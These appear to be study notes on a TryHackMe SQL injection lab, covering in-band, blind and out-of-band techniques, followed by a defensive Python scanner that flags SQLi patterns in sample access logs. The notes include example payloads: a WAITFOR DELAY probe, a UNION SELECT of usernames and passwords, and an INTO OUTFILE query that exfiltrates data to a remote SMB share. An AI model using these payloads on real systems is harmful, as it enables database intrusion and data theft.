SQL Injection
https://tryhackme.com/room/advancedsqlinjection
Types of SQLi
In-Band
In this type, the attacker uses an input field (or something similar) to manipulate the application's SQL query and carry out malicious activity, and the same communication channel carries both the injection and the retrieved data. Error-based and UNION-based SQLi are two examples.
Error-Based: The goal here is to provoke database error messages that reveal sensitive information such as the database structure or version.
UNION-Based: Here the UNION operator in SQL is used to combine the results of multiple SELECT statements into one result set. This also allows data to be retrieved from other tables.
Inferential or Blind SQLi
This is harder to carry out than in-band injection because the attacker cannot see the results of the injection directly. Instead, the malicious payload is sent and executed, and the overall behaviour of the application is observed to determine whether the injection worked. Time-based and Boolean-based SQLi are two examples.
Time-Based: Here the attacker makes the database delay its response by a specified amount of time when an injected condition evaluates to true. If the page load or data retrieval is delayed by that amount, the attacker knows the condition held and that the target is vulnerable to SQLi. Example (MSSQL syntax):
SELECT * FROM users WHERE id = 1; IF (1=1) WAITFOR DELAY '00:00:05'--
Boolean-Based: Here a query is sent that makes the target respond differently depending on whether an injected condition is true or false. The attacker then compares the responses to tell whether the payload was executed.
Out-of-Band SQLi
Here the attacker cannot use the same channel for the injection and for retrieving the results, so a different channel is used. For example, if the database server on the target allows outbound traffic or exposes network functions, it can send the results of the executed payload to a remote server controlled by the attacker over HTTP or DNS.
This approach is reliable and stealthy because it minimizes the risk of the malicious activity being detected: the attacker can keep receiving data from the compromised system without direct interactions with the database, which is often monitored for malicious executions. Here a crafted query writes its output to another communication channel. For example:
SELECT information from user_Data INTO OUTFILE '/tmp/target.txt';
Below is an example of writing the output to an SMB share.
SELECT sensitive_data INTO OUTFILE '\\\\10.10.162.175\\logs\\out.txt';
After executing this, the attacker can grab the file from the target via SMB or an HTTP server. The query above must be adapted to the database implemented on the target, for example MSSQL, Oracle, etc.
secure_file_priv in MySQL
Sometimes this MySQL system variable is set to a directory path. If the variable is set, MySQL will only allow file writes to the specified directory and nowhere else. Hence the INTO OUTFILE operation is restricted and the attacker cannot exfiltrate data to a location of their choice.
If the secure_file_priv variable is empty then no restrictions will be in place.
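As an added example (not part of the original notes or the TryHackMe room), a small Python scanner that turns the taxonomy above into detection rules and runs them over constructed access-log lines: each decoded query-parameter value is checked for the out-of-band, time-based, UNION-based and boolean-based signatures described here, and a lone quote paired with a 5xx response is reported as a suspected error-based probe. The log lines, client IPs and parameter names are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from any real system). The injected values
# mirror the SQLi classes in these notes, percent-encoded as a client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%3B%20IF%20(1%3D1)%20WAITFOR%20DELAY%20%2700%3A00%3A05%27-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1%20AND%201%3D1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=1%27 HTTP/1.1" 500 300
10.0.0.11 - - [01/Jan/2024:10:00:06 +0000] "GET /export?q=1%20INTO%20OUTFILE%20%27%2Ftmp%2Ftarget.txt%27 HTTP/1.1" 200 100
"""

# Common-log-format request line: client IP, method, request target, HTTP status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Ordered most specific first; each rule runs over the *decoded* parameter value.
RULES = [
    ("out-of-band", re.compile(r"\b(?:INTO\s+(?:OUT|DUMP)FILE|LOAD_FILE\s*\()", re.I)),
    ("time-based blind", re.compile(r"\b(?:WAITFOR\s+DELAY|SLEEP\s*\(|PG_SLEEP\s*\(|BENCHMARK\s*\()", re.I)),
    ("union-based", re.compile(r"\bUNION\b(?:\s+ALL)?\s+SELECT\b", re.I)),
    ("boolean-based blind", re.compile(r"\b(?:AND|OR)\s+\S+\s*=\s*\S+", re.I)),
]
# A lone quote only shows something broke the query; treat it as an error-based
# probe when the application answered 5xx, which is the response such probing looks for.
QUOTE_RE = re.compile(r"['\"]")


def classify_value(value: str, status: int):
    """Return the SQLi class suggested by one decoded parameter value, or None."""
    for label, rx in RULES:
        if rx.search(value):
            return label
    if status >= 500 and QUOTE_RE.search(value):
        return "error-based (suspected)"
    return None


def scan_log(text: str):
    """Return (client_ip, parameter, decoded_value, label) for every flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        status = int(m.group("status"))
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):  # decodes %xx and '+'
            label = classify_value(value, status)
            if label:
                findings.append((m.group("ip"), name, value, label))
    return findings
```

Running `scan_log(SAMPLE_LOG)` flags five of the six requests, one per SQLi class; the plain `id=1` request is left alone.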